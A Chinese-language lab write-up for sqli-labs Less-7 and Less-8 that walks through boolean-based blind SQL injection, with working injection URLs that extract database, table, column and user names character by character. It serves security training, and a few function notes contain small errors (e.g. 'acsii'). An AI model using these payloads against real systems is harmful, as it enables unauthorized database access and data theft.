sqli-labs-master【Less-7/8】

Less-7

可以看出，Less-7页面回显就两种结果，这关同样没有显示位，只会返回正确和错误两种结果，报错型至少语法错误会回显错误在页面，所以一般这种都是用于布尔型注入来爆破；

1. 构造闭合

http://192.168.228.129/sqli-labs-master/Less-7/?id=1‘)) --+

因为这种不会有回显，所以我们只能通过一些函数来猜，那么我们先来介绍几种函数，如下：

Length ()   		//返回字符串的长度
Length (abc)   	    //返回3，表示abc字符串长度为3

Substr ()				//截取字符串
Substr (abc,1,1)		//返回a，从abc的第一位开始截，步长为1

Mid ()				//取出字符串的一部分值
Mid (abc,1,1)		//返回a，从abc的第一位开始取，步长为1，与substr ()用法一致

Left ()				//取出字符串左边的几个数据
Left (abc,1)			//返回a
Left (abc,2)			//返回ab

Right ()				//取出字符串右边的几个数据
Right (abc,1)			//返回c
Right (abc,2)			//返回bc

Ord () 与 acsii ()		//返回一个字符的acsii码值
Acsii(s)				//返回114

Hex ()				//返回十六进制数

2. 猜表长度

http://192.168.228.129/sqli-labs-master/Less-7/?id=1’)) and (length(database()) > 5)--+

根据页面回显得出，库长度是＞5的，通过前面几关我们已经知道，库名是security，长度为8，所以我们直接进行下一步；

3. 猜库名、表名、列名、数据

还是一样，我们知道库名第一个字母是s，s用acsii表示是115，所以我们直接用=115来测试：

http://192.168.228.129/sqli-labs-master/Less-7/?id=1‘)) and (ord(substr(database(),1,1)) = 115)--+

这种就比较麻烦，需要一个一个去试，爆库的方法就是这样，掌握之后，我们现在尝试猜表：

根据之前的我们都知道需要查的数据在users表中，所以我们直接用limit控制查询users表

http://192.168.228.129/sqli-labs-master/Less-7/?id=1’)) and (ord(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),1,1)) = 117 ) --+

u用ascii表示是117，所以我们查询成功，剩余的几个字母根据相同的方法查询，接着我们来猜字段：

http://192.168.228.129/sqli-labs-master/Less-7/?id=1‘)) and (ord(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=’users‘ limit 0,1),1,1)) > 105 ) --+

105就是i，我们已经知道users表中的字段为id-username-password，所以现在我们来爆数据：

192.168.228.129/sqli-labs-master/Less-7/?id=1')) and (ord(substr((select username from users limit 0,1),1,1)) = 68 ) --+

68就是D，剩下的字母以及密码可以按照相同的方式进行尝试；
到此，Less-7就结束了！

Less-8

先来判断闭合方式：

可以看出，闭合方式为单引号闭合，验证：
1’ and 1=1 --+

1’ and 1=2 --+

正确，就是单引号闭合！
Less-7和8都是可以基于布尔型盲注的，只是在闭合方式上有所差异，Less-8爆库、表、字段、数据的方法跟7一样，所以不再演示，大家可以自己去尝试着爆破！！！